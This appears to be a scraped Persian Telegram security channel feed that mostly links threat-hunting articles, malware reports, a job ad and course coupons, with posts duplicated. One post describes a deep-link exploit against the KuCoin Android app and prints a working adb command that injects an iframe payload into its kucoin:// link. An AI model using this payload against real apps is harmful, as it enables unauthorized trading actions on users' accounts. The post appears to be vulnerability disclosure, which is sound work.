مقاله ی خوب بخوانیم
امروز درمورد متریک های هانت مطلبی داشتم.
اما یک مقاله کاملتر در این زمینه در لینک زیر هست که توصیه میکنم بخونید
اگر سخت بود و نتونستید بخاطر شرایط تحریم اکانت مدیوم داشته باشید لینک مقاله رو در سایت readmedium دات کام بگذارید سپس مقاله کامل رو دریافت کنید
https://kostas-ts.medium.com/threat-hunting-metrics-the-good-the-bad-and-the-ugly-d662907379b2
امروز درمورد متریک های هانت مطلبی داشتم.
اما یک مقاله کاملتر در این زمینه در لینک زیر هست که توصیه میکنم بخونید
اگر سخت بود و نتونستید بخاطر شرایط تحریم اکانت مدیوم داشته باشید لینک مقاله رو در سایت readmedium دات کام بگذارید سپس مقاله کامل رو دریافت کنید
https://kostas-ts.medium.com/threat-hunting-metrics-the-good-the-bad-and-the-ugly-d662907379b2
Medium
Threat Hunting Metrics: The Good, The Bad and The Ugly
Threat hunting is a crucial aspect of information security, but measuring its effectiveness can be challenging. In this article, we will…
Windows+ATT&CK_Logging+Cheat+Sheet_ver_Sept_2018.pdf
1.1 MB
🔆 جدول رویداد های ویندوز در تناظر با تکنیک های جدول مایتره
⛳️ یعنی برای کشف یک تکنیک نفوذ و حمله ای که نام برده شده است چه Event ID در لاگ برای کشف وجود دارد
#cybersecurity #threathunting #cyberforensics
@Engineer_Computer
⛳️ یعنی برای کشف یک تکنیک نفوذ و حمله ای که نام برده شده است چه Event ID در لاگ برای کشف وجود دارد
#cybersecurity #threathunting #cyberforensics
@Engineer_Computer
چالش کمبود امنیت هنوز باقی است
برخلاف برخی نظر ها
هنوز کمبود نیروی انسانی امنیت در دنیا چالش است
#cybersecurity
https://www.darkreading.com/cybersecurity-operations/cyber-staffing-shortages-remain-cisos-biggest-challenge
@Engineer_Computer
برخلاف برخی نظر ها
هنوز کمبود نیروی انسانی امنیت در دنیا چالش است
#cybersecurity
https://www.darkreading.com/cybersecurity-operations/cyber-staffing-shortages-remain-cisos-biggest-challenge
@Engineer_Computer
Darkreading
Cyber Staffing Shortages Remain CISOs' Biggest Challenge
Besides operational issues connected to a talent shortage, the cost of running security platforms — and their training costs — also keeps CISOs up at night.
#استخدام
کارشناس DLP
دریافتی خالص ۳۰ م تومان
پاداش بهره وری تا ۵ م تومان
مسلط به سکوریتی پلاس ، سنز ۵۰۴
ارسال رزومه به
detect@chmail.ir
ترجیحا مسلط به DLP و رجکس نویسی
آموزشهای لازم داده خواهد شد
حتما درج شود کارشناس DLP
@Engineer_Computer
کارشناس DLP
دریافتی خالص ۳۰ م تومان
پاداش بهره وری تا ۵ م تومان
مسلط به سکوریتی پلاس ، سنز ۵۰۴
ارسال رزومه به
detect@chmail.ir
ترجیحا مسلط به DLP و رجکس نویسی
آموزشهای لازم داده خواهد شد
حتما درج شود کارشناس DLP
@Engineer_Computer
Ransomware Report Cyentia and CIS.pdf
1.8 MB
آخرین ترند ها و ریسک ها در باج افزارها
@Engineer_Computer
@Engineer_Computer
این دوره هارو به اکانت یودمیتون اضافه کنید تا برداشته نشده
موضوع :
Beyond Hacks: Ethical Hacking Practice Test
Link :
1.
https://www.udemy.com/course/beyond-hacks2024-pro-eh-tests-unofficial-module-12-to-16/?couponCode=1A574D25CA480F9C66DB
2.
https://www.udemy.com/course/beyond-hacks-2024-pro-ceh-tests-unofficial-module-7-to-12/?couponCode=E8753FE7AD7E4B80F9DC
@Engineer_Computer
موضوع :
Beyond Hacks: Ethical Hacking Practice Test
Link :
1.
https://www.udemy.com/course/beyond-hacks2024-pro-eh-tests-unofficial-module-12-to-16/?couponCode=1A574D25CA480F9C66DB
2.
https://www.udemy.com/course/beyond-hacks-2024-pro-ceh-tests-unofficial-module-7-to-12/?couponCode=E8753FE7AD7E4B80F9DC
@Engineer_Computer
Inside the Mind of a CISO.pdf
2.1 MB
نظرسنجی در حوزه های امنیت سایبری از CISO ها
@Engineer_Computer
@Engineer_Computer
مدال طلای المپیاد جهانی کامپیوتر
دبیر المپیاد جهانی کامپیوتر
عضو هیئت علمی دانشگاه صنعتی شریف
ثبت نام فراموش نشه
https://www.sharifml.ir/
شروع یکشنبه یکم مهرماه
کانال استاد عزیز شریفی زارچی👇👇
@sharif_ml
@Engineer_Computer
دبیر المپیاد جهانی کامپیوتر
عضو هیئت علمی دانشگاه صنعتی شریف
ثبت نام فراموش نشه
https://www.sharifml.ir/
شروع یکشنبه یکم مهرماه
کانال استاد عزیز شریفی زارچی👇👇
@sharif_ml
@Engineer_Computer
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ اکسپلویت DeepLink و جاوا اسکریپت اینترفیس و بدست آوردن دسترسی غیرمجاز در اپ اندروید صرافی کوکوین
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
📎 BlogPost
@Engineer_Computer
#Android
در این حمله اتکر توانایی باز کردن پوزیشن ترید و همچنین بستن ترید های باز داخل اپ اندرویدی را تنها با کلیک کردن بر روی یک لینک بدست می آورد
adb shell am start -d 'kucoin:///link?data=\<noscript\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</noscript\>'
📎 BlogPost
@Engineer_Computer
#Android
یکی از دغدغه های مدیران و متخصصان امنیت در زمان حادثه اینه که داده ها چقدر و چطور از سازمان خارج شده اند
سوالاتی در این زمینه هست با جواب هایی
اونها رو در لینک زیر بخونید
#نشت_داده #امنیت #امنیت_سایبری
#cybersecurity #threathunting
https://medium.com/@securityaura/data-exfiltration-questions-and-how-to-answer-them-84856b14003c
@Engineer_Computer
سوالاتی در این زمینه هست با جواب هایی
اونها رو در لینک زیر بخونید
#نشت_داده #امنیت #امنیت_سایبری
#cybersecurity #threathunting
https://medium.com/@securityaura/data-exfiltration-questions-and-how-to-answer-them-84856b14003c
@Engineer_Computer
Medium
Data Exfiltration: Questions and How to Answer Them
An Incident Responder insights and stories on how to approach data exfiltration
مقاله زیر رو انتخاب کردم واسه کسایی که میخوان عملکرد EDR رو درک کنند
https://synzack.github.io/Blinding-EDR-On-Windows/
@Engineer_Computer
https://synzack.github.io/Blinding-EDR-On-Windows/
@Engineer_Computer
Red Team Blog
Blinding EDR On Windows
Acknowledgements My understanding of EDRs would not be possible without the help of many great security researchers. Below are some write-ups and talks that really helped me gain the understanding needed and hit the ground running on the research that will…
گزارش های مندینت
خواندنی و مهم
این بار آلوده سازی از طریق PDF
https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/?linkId=10998021
@Engineer_Computer
خواندنی و مهم
این بار آلوده سازی از طریق PDF
https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/?linkId=10998021
@Engineer_Computer
Google Cloud Blog
An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader | Google Cloud Blog
UNC2970 is a cyber espionage group suspected to have a North Korea nexus.
یک گزارش تحلیل بدافزار جالب بخونیم
#امنیت_سایبری #پاورشل #securityawareness #cybersecurity
** تعطیلات ، از سرمایه مهم هستند برای ارتقای شغلی شما . دریابید.
https://securelist.com/sambaspy-rat-targets-italian-users/113851/
@Engineer_Computer
#امنیت_سایبری #پاورشل #securityawareness #cybersecurity
** تعطیلات ، از سرمایه مهم هستند برای ارتقای شغلی شما . دریابید.
https://securelist.com/sambaspy-rat-targets-italian-users/113851/
@Engineer_Computer
Securelist
SambaSpy – a new RAT targeting Italian users
Kaspersky researchers detected a campaign exclusively targeting Italian users by delivering a new RAT dubbed SambaSpy